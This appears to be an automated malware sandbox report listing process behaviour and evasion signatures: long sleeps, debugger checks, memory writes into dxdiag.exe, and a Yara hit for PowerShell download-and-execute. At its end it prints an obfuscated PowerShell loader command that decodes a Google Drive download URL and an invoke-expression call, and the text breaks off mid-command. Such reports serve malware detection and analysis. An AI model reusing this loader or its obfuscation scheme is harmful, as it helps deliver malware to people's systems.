Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\dxdiag.exe

API/Special instruction interceptor: Address: 474C1C7

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4677	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5135	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6679	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3015	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Window / User API: threadDelayed 4854	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 1892	Thread sleep count: 4854 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5248	Thread sleep time: -60000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\dxdiag.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\dxdiag.exe	Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Windows\SysWOW64\dxdiag.exe

Thread sleep count: Count: 4854 delay: -5

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000006024000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2226848933.000001F3C89A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_0301D508 LdrInitializeThunk,LdrInitializeThunk,

4_2_0301D508

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7156.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2A00000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 270FDE8			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo 